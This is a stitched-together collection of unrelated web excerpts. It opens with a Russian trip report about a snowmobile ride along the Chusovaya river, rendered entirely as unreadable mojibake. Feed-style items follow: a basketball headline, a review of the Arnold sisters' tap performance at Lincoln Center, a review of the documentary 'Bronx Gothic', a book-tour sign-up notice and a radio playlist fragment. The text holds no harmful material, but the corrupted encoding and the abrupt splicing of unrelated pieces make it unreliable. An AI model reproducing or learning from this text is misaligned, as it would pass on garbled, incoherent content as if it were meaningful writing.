Ð£ Ð¿Ð°Ð¼ÑÑÐ½Ð¸ÐºÐ° Ð¿Ð¾ÐºÐ¾ÑÐ¸ÑÐµÐ»ÑÐ¼ Ð£ÑÐ°Ð»Ð° (Ð² Ð½Ð°ÑÐ¾Ð´Ðµ â ÐÑÐ¼Ð°ÐºÑ) Ð½Ð° Ð±ÐµÑÐµÐ³Ñ Ð§ÑÑÐ¾Ð²Ð¾Ð¹ ÑÑÑÑÐ¾Ð¸Ð»Ð¸ Ð½ÐµÐ±Ð¾Ð»ÑÑÐ¾Ð¹ Ð¿Ð¸ÐºÐ½Ð¸Ðº. Ð¡ÐµÑÐµÐ³Ð° ÐÐ¸ÑÐ°Ð³Ð° Ð¿ÑÐ¾ÑÐ¸ÑÐ°Ð» Ð»ÐµÐºÑÐ¸Ñ Ð½Ð° ÑÐµÐ¼Ñ: ÐÐ°Ðº Ð¸ ÑÑÐ¾ ÑÐ¿Ð»Ð°Ð²Ð»ÑÐ»Ð¸ Ð¿Ð¾ Ð§ÑÑÐ¾Ð²Ð¾Ð¹ â Ð¿Ð¾Ð·Ð½Ð°Ð²Ð°ÑÐµÐ»ÑÐ½Ð¾.
ÐÑÐµ ÑÐ°Ð· Ð¿ÐµÑÐµÐ¿ÑÑÐ³Ð½ÑÐ»Ð¸ ÑÐµÑÐµÐ· Ð§ÑÑÐ¾Ð²ÑÑ Ð¸ Ð¿Ð¾ÐµÑ Ð°Ð»Ð¸ Ð² ÑÑÐ¾ÑÐ¾Ð½Ñ ÐÐ¸ÑÐ°Ð½Ð¾Ð³Ð¾ ÐºÐ°Ð¼Ð½Ñ. ÐÐ¾ÑÑÐ¸ Ð²ÑÐµ Ð¸Ð´ÑÑ ÑÑÐ´Ð° Ð¿Ð¾ ÑÐµÐºÐµ, Ð½Ð¾ Ñ Ð½Ð°Ñ Ð´ÑÑÐ³Ð¾Ð¹ Ð¿ÑÑÑ â Ð¿Ð¾ ÑÑÑÐµ.
ÐÐ¿ÐµÑÐµÐ´Ð¸ ÑÑÐ°ÑÑÐ¾Ðº Ð»ÐµÑÐ°
ÐÐ¾ÑÐ»Ðµ Ð½ÐµÑÐºÐ¾Ð»ÑÐºÐ¸Ñ Ð½ÐµÐ¿ÑÐ°Ð²Ð¸Ð»ÑÐ½ÑÑ Ð¿Ð¾Ð¿ÑÑÐ¾Ðº Ð²ÑÑÐ°ÑÑ Ð½Ð° ÑÑÐ¶Ð¾Ð¹ ÑÑÐ°ÑÑÐ¹ ÑÐ»ÐµÐ´ Ð²ÑÐµ-ÑÐ°ÐºÐ¸ Ð½Ð°ÑÐ»Ð¸ Ð½ÑÐ¶Ð½Ð¾Ðµ Ð½Ð°Ð¿ÑÐ°Ð²Ð»ÐµÐ½Ð¸Ðµ Ð¸ Ð¿Ð¾ÑÐ»Ð¸.
ÐÑÐ°Ð²Ð´Ð° Ð¿Ð¾ÑÐ»Ð¸ Ð¿Ð¾ÑÑÐ¸ Ð±ÑÐºÐ²Ð°Ð»ÑÐ½Ð¾. ÐÐ¾ÑÐ¾Ð³Ð° Ð±ÑÐ»Ð° Ð²Ð´Ð¾Ð»Ñ ÑÐºÐ»Ð¾Ð½Ð° Ð¸ Ð½Ð° Ð¯Ð¼Ð°Ñ Ðµ ÐÐµÐ½ÑÑÑÐµ Ð¢Ð¤ Ð±ÑÐ»Ð¾ ÐµÑ Ð°ÑÑ Ð¿ÑÐ°Ð²Ð´Ð° ÑÐ»Ð¾Ð¶Ð½Ð¾, ÐÐµÐ½Ð° Ð½Ð¸ÐºÐ°Ðº Ð½Ðµ Ð¼Ð¾Ð³Ð»Ð° ÑÐ¿ÑÐ°Ð²Ð¸ÑÑÑÑ Ñ Ð¼Ð°ÑÐ¸Ð½Ð¾Ð¹ Ð½Ð° ÑÐºÐ»Ð¾Ð½Ðµ, Ð¿Ð¾ÑÐ¾Ð¼ Ð¿ÑÐ¾Ð±Ð¾Ð²Ð°Ð»Ð¸ ÑÑÐ¼Ð¸ÑÐ¸ÑÑ ÐºÐ¾Ð½Ñ Ð¿Ð¾ÑÑÐ¸ Ð²ÑÐµ Ð¾ÑÑÐ°Ð»ÑÐ½ÑÐµ Ð¿Ð¾Ð¸Ð¼ÐµÐ½Ð½Ð¾ â ÑÐ¾Ð¶Ðµ Ð½Ðµ ÑÐ¸Ð»ÑÐ½Ð¾ ÑÑÐ¿ÐµÑÐ½Ð¾ â ÑÑÐ°ÑÐºÐ¸Ð²Ð°ÐµÑ Ð²Ð½Ð¸Ð·.
Ð Ð°Ð·Ð¾Ðº Ð²ÑÑÐ°Ð²Ð¸Ð»Ð¸ Ð»Ð¸Ð½ÐµÐ¹ÐºÑ Ð² ÑÐ½ÐµÐ³
Ð Ð¿Ð¾Ð¿Ð¸Ð»Ð¸ ÑÐ°Ð¹, Ð²Ð¾Ð´Ñ Ð¸ ÐºÐ¾Ð»Ñ, Ð¿Ð¾Ð¿Ð¾Ð»Ð½ÑÑ ÐºÐ¸ÑÐ»Ð¾ÑÐ½Ð¾-ÑÐ¾Ð»ÐµÐ²Ð¾Ð¹, Ð²Ð¾Ð´Ð½Ð¾-ÑÐµÐ»Ð¾ÑÐ½Ð¾Ð¹ Ð¸ ÐºÐ°ÐºÐ¾Ð¹-ÑÐ¾ ÑÐ°Ð¼ Ð½Ð°Ð²ÐµÑÐ½Ð¾Ðµ ÐµÑÐµ Ð±Ð°Ð»Ð°Ð½Ñ.
ÐÑÑÐºÐ¾ÑÐ¸Ð»Ð¸ Ðº ÐÐ°ÑÐºÐµ (ÑÐ¾Ð¶Ðµ Ð¸ÑÑÐµÐ·Ð½ÑÐ²ÑÐ°Ñ Ð´ÐµÑÐµÐ²Ð½Ñ) Ð½ÐµÐ´Ð°Ð»ÐµÐºÐ¾ Ð¾Ñ Ð¥Ð°ÑÐµÐ½Ð¾Ðº
Ð¡Ð¾ ÑÐ½ÐµÐ³Ð¾Ð¼ Ð¸ Ð»Ð°Ð½Ð´ÑÐ°ÑÑÐ¾Ð¼ ÑÐ°Ð¼ Ð¿Ð¾Ð»Ð½ÑÐ¹ Ð¿Ð¾ÑÑÐ´Ð¾Ðº
ÐÐµ ÑÑÐ°Ð»Ð¸ Ð½Ð°ÑÑÑÐ°ÑÑ Ð´ÐµÐ²ÑÑÐ²ÐµÐ½Ð½Ð¾ÑÑÐ¸ ÑÑÐ¸Ñ Ð¼ÐµÑÑ. ÐÐµÐ¼Ð½Ð¾Ð³Ð¾ Ð¿Ð¾ÐºÑÑÐ¶Ð¸Ð»Ð¸ÑÑ Ð½Ð° Ð¼Ð°Ð»ÐµÐ½ÑÐºÐ¾Ð¼ Ð¿ÑÑÐ°ÑÐºÐµ Ð¸ ÑÐ´ÐµÐ»Ð°Ð»Ð¸ Ð½ÐµÑÐºÐ¾Ð»ÑÐºÐ¾ ÑÐ¾ÑÐ¾.
ÐÐ°Ð»ÐµÐµ ÐÐºÐ²Ð°. Ð¥Ð¾ÑÐµÐ»Ð¾ÑÑ Ð¿ÑÐ¾Ð¹ÑÐ¸ Ð²ÑÐµ Ð¿Ð¾ ÑÑÑÐµ, Ð±ÐµÐ· Ð²ÑÑ Ð¾Ð´Ð° Ð½Ð° ÑÐµÐºÑ, Ð½Ð¾ Ð¿Ð¾ÑÐµÑÑÐ»Ð¸ Ð¼Ð½Ð¾Ð³Ð¾ Ð²ÑÐµÐ¼ÐµÐ½Ð¸ Ð½Ð° Ð¿Ð¾Ð»ÑÐ½ÐºÐ°Ñ Ð¸ Ð»ÐµÑÐ½Ð¾Ð¼ ÑÐºÐ»Ð¾Ð½Ðµ â Ð¿Ð¾ÑÑÐ¾Ð¼Ñ Ð¿Ð°ÑÑ ÑÐ°Ð· ÑÑÐ½ÑÐ²ÑÐ¸ÑÑ Ð½Ð° ÑÑÐ°ÑÑÐµ Ð¿ÑÑÐ¸ÐºÐ¸, Ð²ÑÐµ-ÑÐ°ÐºÐ¸ Ð¿ÑÐ¸Ð½ÑÐ»Ð¸ ÑÐµÑÐµÐ½Ð¸Ðµ ÐµÑ Ð°ÑÑ Ð´Ð¾ ÐÐºÐ²Ñ, Ð¿Ð¾ÑÐ»Ðµ ÐºÐ¾ÑÐ¾ÑÐ¾Ð¹ Ð¿Ð¾ÑÑÐ¸ ÑÑÐ°Ð·Ñ Ð¿ÑÑÐ³Ð½ÑÐ»Ð¸ Ñ ÑÐµÐºÐ¸ ÑÐ½Ð¾Ð²Ð° Ð½Ð° ÑÐºÐ°Ð»Ñ.
ÐÐ¿ÐµÑÐµÐ´Ð¸ Ð¾ÑÐºÑÑÑÐ°Ñ Ð²Ð¾Ð´Ð° Ð½Ð° ÑÑÑÐµÐ¼Ð½Ð¸Ð½Ð°Ñ â Ð½Ðµ Ñ Ð¾ÑÐµÐ»Ð¾ÑÑ ÑÐ¸ÑÐºÐ¾Ð²Ð°ÑÑ.
Ð¡Ð¿ÑÑÑÐ¸Ð»Ð¸ÑÑ Ð¾Ð¿ÑÑÑ Ðº ÑÐµÐºÐµ â Ð·Ð´ÐµÑÑ Ð´Ð°Ð²Ð½ÑÐ¼ Ð´Ð°Ð²Ð½Ð¾ ÑÑÐ¾ÑÐ»Ð° Ð´ÐµÑÐµÐ²Ð½Ñ ÐÐµÑÐ¼ÑÐºÐ¾Ð²Ð¾. ÐÐ¸ÑÐ°Ð³Ð° Ð¿Ð¾ Ð¿ÑÑÐµÐ²Ð¾Ð´Ð¸ÑÐµÐ»Ñ ÑÐ°ÑÑÐºÐ°Ð·Ð°Ð», ÑÑÐ¾ Ð·Ð´ÐµÑÑ Ð¶Ð¸Ð»Ð¸ Ð¾ÑÐ¸Ð³ÐµÐ½Ð½ÑÐµ Ñ Ð¸ÑÑÐ¾Ð¿Ð¾Ð¿Ð¾Ð²ÑÑ: Ð¾Ð½Ð¸ Ð¿ÑÐ¾Ð¼ÑÑÐ»ÑÐ»Ð¸ ÑÐµÐ¼, ÑÑÐ¾ ÑÐºÐ°Ð·ÑÐ²Ð°Ð»Ð¸ ÑÐ¿Ð»Ð°Ð²ÑÐ¸ÐºÐ°Ð¼ Ð¶ÐµÐ»ÐµÐ·Ð° Ð½ÐµÐ²ÐµÑÐ½ÑÐ¹ Ð¾Ð±Ñ Ð¾Ð´ Ð¾ÑÑÑÐ¾Ð²Ð°, Ð±Ð°ÑÐ¶Ð¸ ÑÐ°Ð´Ð¸Ð»Ð¸ÑÑ Ð½Ð° Ð¼ÐµÐ»Ñ Ð¸ ÐÐµÑÐ¼ÑÐºÐ¾Ð²ÑÑ Ð·Ð° Ð´ÐµÐ½ÑÐ³Ð¸ Ð²ÑÑÐ°ÑÐºÐ¸Ð²Ð°Ð»Ð¸ Ð¿Ð¾ÑÑÑÐ°Ð´Ð°Ð»ÑÑÐµÐ².
Ð Ð²Ð¾Ñ Ð¾ÑÑÑÐ´Ð° Ð´Ð¾ ÑÐ¸Ð½Ð¸ÑÐ° Ð±ÑÐºÐ²Ð°Ð»ÑÐ½Ð¾ Ð¿Ð°ÑÐ° ÐºÐ¸Ð»Ð¾Ð¼ÐµÑÑÐ¾Ð² Ð¿Ð¾ ÑÐµÐºÐµ, Ñ Ð¾ÑÑ Ð¿ÑÑÐ¸Ðº Ð¿Ð¾ ÑÑÑÐµ Ð¼Ñ Ð¿Ð¾ÑÐ¾Ð¼ Ð²ÑÐµ-ÑÐ°ÐºÐ¸ Ð½Ð°ÑÐ»Ð¸.
ÐÐ¾Ñ Ð¾Ð½ â ÐÐµÐ¼Ð¸Ð´Ð¾Ð²ÑÐºÐ¸Ð¹ ÐºÑÐµÑÑ. ÐÐ¾ÑÑÐ¸ Ð½Ð° Ð·Ð°ÐºÐ°ÑÐµ, Ð½Ð¾ ÑÑÐ¿ÐµÐ»Ð¸.
ÐÐ° Ð·Ð°Ð´Ð½ÐµÐ¼ Ð¿Ð»Ð°Ð½Ðµ ÐÐ¸ÑÐ°Ð½ÑÐ¹ ÐºÐ°Ð¼ÐµÐ½Ñ. ÐÐ° Ð½ÐµÐ¼ Ð²Ð¸Ð´Ð½ÐµÐµÑÑÑ ÑÐ°Ð±Ð»Ð¸ÑÐºÐ°, ÐºÑÐµÑÑ, Ð²ÑÐ±Ð¸ÑÑÐ¹ Ð² ÑÐºÐ°Ð»Ðµ, Ð½Ðµ ÑÐ°Ð·Ð³Ð»ÑÐ´ÐµÐ»Ð¸.
Ð Ð°Ð½ÑÑÐµ ÑÑÐ¾Ñ ÐºÑÐµÑÑ ÑÑÐ¾ÑÐ» Ð½Ð°Ð¾Ð±Ð¾ÑÐ¾Ñ â ÑÑÐ¾Ð¹ ÑÑÐ¾ÑÐ¾Ð½Ð¾Ð¹ Ðº ÑÐºÐ°Ð»Ðµ, Ð½Ð¾ Ð² ÑÐ¾Ð²ÐµÑÑÐºÐ¾Ðµ Ð²ÑÐµÐ¼Ñ ÐµÐ³Ð¾ ÑÑÐ¾Ð½Ð¸Ð»Ð¸, Ð° Ð¿Ð¾ÑÐ¾Ð¼ Ð½ÐµÐ¿ÑÐ°Ð²Ð¸Ð»ÑÐ½Ð¾ Ð¿Ð¾ÑÑÐ°Ð²Ð¸Ð»Ð¸.
Ð¢Ð°ÐºÐ¶Ðµ Ð½Ð° ÑÑÐ¾Ð¹ ÑÑÐ¾ÑÐ¾Ð½Ðµ Ð²Ð¸Ð´Ð½Ð° Ð²ÑÐ±Ð¸ÑÐ°Ñ Ð½Ð°Ð´Ð¿Ð¸ÑÑ, ÑÑÐ¾ Ð·Ð´ÐµÑÑ ÑÐ¾Ð´Ð¸Ð»ÑÑ ÑÐ³Ð½ÐµÑÐ°ÑÐµÐ»Ñ ÑÐ°Ð±Ð¾ÑÐµÐ³Ð¾ ÐºÐ»Ð°ÑÑÐ° â ÑÐµÐ³Ð¾ ÑÐ¾Ð»ÑÐºÐ¾ Ð½Ð¸ Ð¿ÑÐ¸Ð´ÑÐ¼Ð°ÑÑ ÐºÐ¾Ð¼ÑÐ¾Ð¼Ð¾Ð»ÑÑÑ.
Ð Ð½Ð° Ð´ÑÑÐ³Ð¾Ð¹ ÑÑÐ¾ÑÐ¾Ð½Ðµ Ñ Ð¾ÑÐ¾ÑÐ¾ ÑÐ¾Ñ ÑÐ°Ð½Ð¸Ð²ÑÐ°ÑÑÑ Ð½Ð°Ð´Ð¿Ð¸ÑÑ, ÑÑÐ¾ Ð·Ð´ÐµÑÑ 8 ÑÐµÐ½ÑÑÐ±ÑÑ 1724 Ð³Ð¾Ð´Ð° ÑÐ¾Ð´Ð¸Ð»ÑÑ ÐÐ¸ÐºÐ¸ÑÐ° ÐÐºÐ¸Ð½ÑÐ¸ÐµÐ²Ð¸Ñ ÐÐµÐ¼Ð¸Ð´Ð¾Ð².
Ð£ÑÑÑÐ¾Ð¸Ð»Ð¸ Ð¿Ð¸ÐºÐ½Ð¸Ðº Ñ Ð³Ð¾ÑÑÑÐ¸Ð¼. ÐÑÑÐ¾, ÑÑÐ±Ð°, ÐºÑÑÐ¸ÑÐ° â ÑÑÐ¾ Ð±ÑÐ´ÐµÑÐµ? Ð-Ð¾Ð±ÑÐµÐ¼, Ð²ÑÐµ Ð¿Ð¾ Ð¼ÐµÐ½Ñ
ÐÐ¸ÑÐ°Ð³Ð° ÑÐ°Ð·Ð¾Ð³ÑÐµÐ²Ð°ÐµÑ Ð·Ð°ÑÐ°Ð½ÐµÐµ Ð·Ð°Ð³Ð¾ÑÐ¾Ð²Ð»ÐµÐ½Ð½ÑÑ Ð´Ð¾Ð¼Ð°ÑÐ½ÑÑ Ð¶Ð°ÑÐµÐ½ÑÑ ÐºÐ°ÑÑÐ¾ÑÐºÑ.
ÐÐ¾Ð²Ð¾Ð»ÑÐ½Ð¾ Ð´Ð¾Ð»Ð³Ð¾ Ð¾Ð±ÑÑÐ¶Ð´Ð°Ð»Ð¸, ÐºÐ°Ðº ÑÑÑ ÑÐ°Ð½ÑÑÐµ Ð¶Ð¸Ð»Ð¸. Ð¡ÐµÑÐµÐ³Ð° Ð¼Ð½Ð¾Ð³Ð¾ ÑÐ°ÑÑÐºÐ°Ð·ÑÐ²Ð°Ð» Ð¸ÑÑÐ¾ÑÐ¸ÑÐµÑÐºÐ¸Ñ ÑÐ°ÐºÑÐ¾Ð² (Ð¿Ð¾Ð´Ð³Ð¾ÑÐ¾Ð²Ð¸Ð»ÑÑ Ð¾Ð½ Ñ Ð¾ÑÐ¾ÑÐ¾).
Ð¤Ð¾ÑÐ¾Ð³ÑÐ°ÑÐ¸ÑÐ¾Ð²Ð°Ð»Ð¸ÑÑ Ñ ÑÐ°Ð·Ð½ÑÑ ÑÐ°ÐºÑÑÑÐ¾Ð² Ð¸ ÑÐ°Ð·Ð½ÑÐ¼ ÑÐ¾ÑÑÐ°Ð²Ð¾Ð¼.
ÐÐ¾ ÑÐ¶Ðµ Ð²ÑÐµ Ð±Ð¾Ð»ÑÑÐµ ÑÐ¼ÐµÑÐºÐ°ÐµÑÑÑ â Ð³Ð¾Ð½Ð¸Ð¼ Ð¾Ð±ÑÐ°ÑÐ½Ð¾.
ÐÐ° Ð¾Ð±ÑÐ°ÑÐ½Ð¾Ð¼ Ð¿ÑÑÐ¸ Ð·Ð°Ð¼ÐµÑÐ½Ð¾ Ð¿Ð¾Ñ Ð¾Ð»Ð¾Ð´Ð°Ð»Ð¾. Ð¡Ð¿ÑÑÑÐ¸Ð»ÑÑ ÑÑÐ¼Ð°Ð½.
ÐÐ±ÑÐ°ÑÐ½Ð¾ Ð¾Ñ ÐÐºÐ²Ñ Ð¿Ð¾Ð³Ð½Ð°Ð»Ð¸ Ð¿Ð¾ Ð´Ð¾ÑÐ¾Ð³Ðµ â Ð¾Ð½Ð° ÑÐ¸Ð»ÑÐ½Ð¾ Ð·Ð°Ð½ÐµÑÐµÐ½Ð° ÑÐ½ÐµÐ³Ð¾Ð¼ â Ð¿ÑÑÐ¼Ð¾ Ð¤Ð¸Ð½Ð»ÑÐ½Ð´Ð¸Ñ.
ÐÐµ ÑÐ¼Ð¾Ð³Ð»Ð¸ Ð¿ÑÐ¾ÐµÑ Ð°ÑÑ Ð¼Ð¸Ð¼Ð¾ ÑÐ²Ð¾ÑÐ¾ÑÐºÐ¸ Ð½Ð° ÐÐ¼ÑÑÐ½Ð¾Ð¹ ÐÐ°Ð¼ÐµÐ½Ñ (Ð¾ÑÐµÐ½Ñ Ð¶Ð¸Ð²Ð¾Ð¿Ð¸ÑÐ½Ð°Ñ Ð¸ Ð´Ð¾Ð²Ð¾Ð»ÑÐ½Ð¾ Ð²ÑÑÐ¾ÐºÐ°Ñ ÑÐºÐ°Ð»Ð° Ð½Ð° Ð§ÑÑÐ¾Ð²Ð¾Ð¹), ÑÐµÐ¼ Ð±Ð¾Ð»ÐµÐµ, ÑÑÐ¾ Ð¿Ð¾ÑÑÐ¸ Ð½Ð¸ÐºÑÐ¾ Ð¸Ð· Ð³ÑÑÐ¿Ð¿Ñ ÑÐ°Ð¼ ÐµÑÐµ Ð½Ðµ Ð±ÑÐ²Ð°Ð».
ÐÑÑÑÐµÑÐ¸Ð»Ð¸ Ð½ÐµÑÐºÐ¾Ð»ÑÐºÐ¾ ÑÐ½ÐµÐ³Ð¾Ñ Ð¾Ð´ÑÐ¸ÐºÐ¾Ð² Ñ ÐÐµÑÐ²Ð¾ÑÑÐ°Ð»ÑÑÐºÐ°.
ÐÐ° ÐÐ¼ÑÑÐ½Ð¾Ð¼ ÑÐ´ÐµÐ»Ð°Ð»Ð¸ ÑÐ¾ÑÐ¾ ÑÐ¶Ðµ Ð² ÑÑÐ¼ÐµÑÐºÐ°Ñ .
70 Ð¼ÐµÑÑÐ¾Ð². ÐÐ¶ Ð·Ð°Ð¼Ð¸ÑÐ°ÐµÑ Ð²ÑÐµâ¦ Ð£Ð´ÐµÑÐ¶Ð°Ð»Ð¸ Ð¡ÐµÑÐµÐ³Ñ Ð¾Ñ ÑÑÐ°Ð´Ð¸ÑÐ¸Ð¾Ð½Ð½Ð¾Ð³Ð¾ Ð»Ð°Ð·Ð°Ð½Ð¸Ñ Ð¿Ð¾ ÑÐºÐ°Ð»Ðµ.
ÐÐµ ÑÑÐ°Ð»Ð¸ ÑÐ°Ð¼ Ð·Ð°Ð´ÐµÑÐ¶Ð¸Ð²Ð°ÑÑÑÑ. ÐÐ¾ Ð£ÑÑÑ-Ð£ÑÐºÐ¸ Ð´Ð¾Ð»ÐµÑÐµÐ»Ð¸ Ð¿Ð¾ Ð°Ð²ÑÐ¾Ð´Ð¾ÑÐ¾Ð³Ðµ â Ð¿ÑÑÐ¼Ð¾ ÐºÐ°Ðº Ð¿Ð¾ ÑÐ°ÑÑÐ°ÑÐµÐ½Ð½Ð¾Ð¹ ÑÑÐ°ÑÑÐµ. ÐÐ°Ð»ÑÑÐµ Ð´Ð¾ Ð¡ÑÐ»ÐµÐ¼Ð° ÑÐ²Ð¾Ð¸Ð¼ Ð¿ÑÑÐ¸ÐºÐ¾Ð¼.
ÐÑÐµÐ³Ð¾ ÑÐ°ÑÑÑÐ¾ÑÐ½Ð¸Ðµ Ð¿Ð¾Ð»ÑÑÐ¸Ð»Ð¾ÑÑ Ð¾ÐºÐ¾Ð»Ð¾ 100 ÐºÐ¼. ÐÐµÑÐ½ÑÐ»Ð¸ÑÑ Ð¾Ð±ÑÐ°ÑÐ½Ð¾ Ð¿ÑÐ¸Ð¼ÐµÑÐ½Ð¾ Ð² 6-7 Ð²ÐµÑÐµÑÐ°.
ÐÐ¾Ð³Ð¾Ð´Ð° Ð¿ÑÐ¾ÑÑÐ¾ Ð¿ÐµÐ»Ð°. Ð¡Ð½ÐµÐ³ â Ð²ÐµÐ·Ð´Ðµ ÑÐµÐ»Ð¸Ð½Ð°. ÐÐµÑÑÐ° Ð¿ÑÐ¾ÑÑÐ¾ ÑÐ¸ÐºÐ°ÑÐ½ÑÐµ. ÐÐ¸Ð´Ñ Ð½ÐµÐ·Ð°Ð±ÑÐ²Ð°ÐµÐ¼ÑÐµ. Ð¡ ÑÐ°ÐºÐ¸Ð¼Ð¸ ÑÑÐºÐ¸Ð¼Ð¸ Ð²Ð¿ÐµÑÐ°ÑÐ»ÐµÐ½Ð¸ÑÐ¼Ð¸ Ð¼Ñ ÑÐµÐ¿Ð»Ð¾ Ð¿Ð¾Ð¿ÑÐ¾ÑÐ°Ð»Ð¸ÑÑ ÑÐ¾ Ð²ÑÐµÐ¼Ð¸ ÑÑÐ°ÑÑÐ½Ð¸ÐºÐ°Ð¼Ð¸ Ð¿Ð¾Ñ Ð¾Ð´Ð° Ð¸ Ð¿Ð¾ÐµÑ Ð°Ð»Ð¸ Ð´Ð¾Ð¼Ð¾Ð¹, Ð¾Ð±ÑÑÐ¶Ð´Ð°Ñ Ð¿Ð»Ð°Ð½Ñ Ð½Ð° ÑÐ»ÐµÐ´ÑÑÑÐ¸Ðµ Ð²ÑÑ Ð¾Ð´Ð½ÑÐµ.
ÐÐ¾ÑÑÐ¾ÑÐ½Ð½ÑÐ¹ Ð°Ð´ÑÐµÑ Ð¿ÑÐ±Ð»Ð¸ÐºÐ°ÑÐ¸Ð¸: bikepost.ru
|Celticsâ Stretch of Futility Gives Wizards Reason to Believe||Washingtonâs run helped tie the second-round series, 2-2, and made Boston look vulnerable again.|
|Arnold sisters tap, make dreams at Lincoln Center OOD|
In the field of tap, dancer-choreographers Chloe Arnold and Maud Arnold stake out territory in a place of contemporary sound and attack, aiming to take the art of tap to folks whose tastes run to music styles like R'n'B, rock, funk, rap and Latin pop. Did you make it to last evening's Lincoln Center Out-of-Doors performance of Where Dreams Are Made in Hearst Plaza, featuring the Arnold sisters and their Apt. 33 troupe? If so, you heard, among other things, Ed Sheeran's "Shape of You," Sean Paul's "So Fine," John Legend's "Ordinary People" and "Glory," BeyoncÃ©'s "Run the World," Mark Ronson's "Uptown Funk," Andra Day's "I Rise Up," Eminem's "Not Afraid," Jay Z's "Empire State of Mind" and a trio of Prince bestsellers. You also heard, from one song to the next, the troupe layering on a fairly uniform staccato, hard-heeled, hard-charging tap in their rangy, loose-limbed style. Power tap for the people!
Apt. 33 re-envisions Eminem's "Not Afraid" in Charles Renato's 2016 video, featuring is That Asha.
Where Dreams Are Made seemed overly segmented, each bit limited by the length of its popular song and encouraged to lock itself within a certain forceful register (even if, as in "Ordinary People," the song seemed to call for a more vulnerable approach). The sisters' in-between patter advocated more love and unity and sisterhood/brotherhood and exhortations to affirm ourselves as "amazing." I can appreciate that; the Arnolds absolutely do physical and psychic upbeat like nobody's business. Their entire project is the dance equivalent of an energy drink. But as a fan of tap (and, maybe, because I'm an introvert), I also have a longing for some of the other things tap has always done well--softness, juicy lyricism and fine, adroit detail, soulful reflection and nuance, sound that goes on walkabout, winding us through diverse terrains where new, unprecedented things await discovery. I love, sometimes, to hear "I love you" whispered, not always a shout.
Where Dreams Are Made has concluded, but you will find a world of interesting, free events at Lincoln Center Out of Doors, now through August 13, by clicking here.
Subscribe in a reader
|Invisible made visible: Okpokwasili, Rossi present "Bronx Gothic"|
Now ask yourself: Are you awake?
--Okwui Okpokwasili, Bronx Gothic
Christians have a gospel story about Jesus, aware of his fate, praying in the garden of Gethsemane on the night before his crucifixion. All around him, his disciples--whom he had asked to merely keep watch with him--sleep deeply, leaving him alone with his agony.
I thought of this scene as I watched Okwui Okpokwasili in the documentary Bronx Gothic (2017, 91 min.), a film with superb direction by Andrew Rossi and killer editing by Andrew Coffman of Bryan Sarkinen and Rossi's daring cinematography. Launching its world premiere theatrical engagement on July 12 at Film Forum, the film provides deep insight into the motivation and process that guided Okpokwasili's magnificent solo performance piece of the same name. It delves into her experiences, thoughts and feelings as she takes the show on its final tour and holds discussions with members of her audience.
As the film opens, Okpokwasili is in mid-performance, dressed in the color of congealed blood, tears pooling and dripping from her luminous eyes as the persona she inhabits recalls life-changing incidents from a Bronx childhood. I was reminded of the frequent, insistent sobbing in Kyle Abraham's ensemble dance, Dearest Home, and also how, like disciples at Gethsemane, not every viewer will necessarily have the will to stay awake--available, vulnerable, connected, "woke"--when Black artists ask for empathetic witness.
Both Dearest Home and Bronx Gothic--denying any demand for performance to stay within narrow, acceptable confines--make messy vulnerability and intense pain visible, in particular Black pain. Both works reach into as well as beyond their makers' personal history of being Black in America to suggest characters and narrative that should move anyone of heart and conscience.
Okpokwasili was raised within a large, middle-class Nigerian-immigrant family in the comfortable Parkchester section of the Bronx in the 1980s. (Her charming parents, whom we meet late in the film, make an indelible impression.) Describing her solo as "semi-autobiographical" allows it to partake of her extraordinary imagination and her empathy for the pre-teen girls she observed in her youth. She remembers them, remembers their pleasures and their struggles, channels them and serves them with intensely committed soul and physicality. The film's audience is spared little of how violently this haunted performance has wrenched its performer's psyche and body.
Having seen two iterations of Bronx Gothic live (Danspace Project, 2012 and 2014), I can tell you that the film, generously sampling the live performance, only slightly misses the electrifying force of Okpokwasili live. There's nothing quite like being in a close, tent-like enclosure with her as she quakes head to toe, shares sexual secrets, scrapes her bare feet and smacks her bones against a punishing floor.
"Black flesh has deep meaning in this culture," Okpokwasili remarks at one point as she discusses her intentions for Bronx Gothic. All the vivid imagery--the dark and the light, the glistening sweat, the luxurious undulations and seizure-like trembling--serves to underscore this uncomfortable, complicated truth.
As she thinks about how her performance confronts and nearly overwhelms her audience, the artist is also both overwhelmed and intrigued. Recalling her experiences in the role, she asks an imaginary watcher, "Is my Blackness getting on you? Am I getting on you? Can you take on the pain?"
Not for nothing is the genre-spanning Okpokwasili one of our most respected artists, a Bessie-winner to boot. I hope Rossi's portrait of her will be seen widely. I rank Bronx Gothic up there with Raoul Peck's I Am Not Your Negro as another urgent, earthshaking documentary that must be seen and must be discussed.
Showings at 12:30, 2:30, 4:40, 7:00 and 9:10
Wednesday, July 12 through Tuesday, July 25
Q&As with Okpokwasili and Rossi at the 7pm shows
Wednesday, July 12, Friday, July 14 and Saturday, July 15
For information and tickets, click here.
209 West Houston Street (west of Sixth Avenue), Manhattan
Subscribe in a reader
|NEW BOOK TOUR SIGN UPS - October THE KITCHEN MISTRESS--Katherineâs StoryâThe Letter SeriesâBook 3 by Kathleen Shoop|
NEW BOOK TOUR SIGN UPS - October
THE KITCHEN MISTRESS--Katherineâs StoryâThe Letter SeriesâBook 3 by Kathleen Shoop
Can be read as a stand alone read
Note from author - this is a lengthy read x
Tour mid October onwards
SIGN UPS HERE - https://docs.google.com/forms/d/e/1FAIpQLScumL79KSqOuZtFrn2eSNfrIEPT74sCbP6ZjatHL_qu0DB2dQ/viewform
For every woman whoâs had to choose between the secrets that protect her and the people she loves the mostâ¦
Katherine Arthur and her family are back and itâs time to collect the money Mrs. Mellet left them in her will. The tidy sum will allow the family peace of mind and a future thatâs stable and fulfilling. But when things donât go exactly as planned, Katherine steps up to do more than her share. Hired as a kitchen mistress, her intuition (with the help of a mysterious recipe book), cooking prowess, and work ethic make her the perfect partner for the enigmatic, wealthy woman next door. Then Aleksey Zurchenko arrives.
Violet Pendergrass is a well-heeled, progressive woman with half a fortune in one hand and a plan for enduring prosperity in the other. Resourceful, shrewd, and tough, Violet doesnât realize her one and only weakness leaves her vulnerable as she attempts to solidify her independence. She sees unparalleled value in Katherineâs gifts and does her best to keep the girl close, to keep her true work secret from her mother and the world.
Katherineâs loyalties to her mother and Violet grow strained and soon her commitment to both frays even further as her feelings for Aleksey grow. Katherine must decide if pursuing her work with the formidable Violet and protecting her family are more important than following love. Can she do it all? Love, hope, joy, secrets buried in walls and hearts; all are threatened by those who claim to care about the Arthurs. Can Katherine separate whatâs right and true from what it takes to survive? Are they even different things?
|The Afternoon Sound Alternative 09-07-2016 with Michael Buck||
Paul Kimbiris- Bring Out Your Dead - Dark Side Of Pearl
- voicebreak -
Ages And Ages- Something To Ruin - Something To Ruin
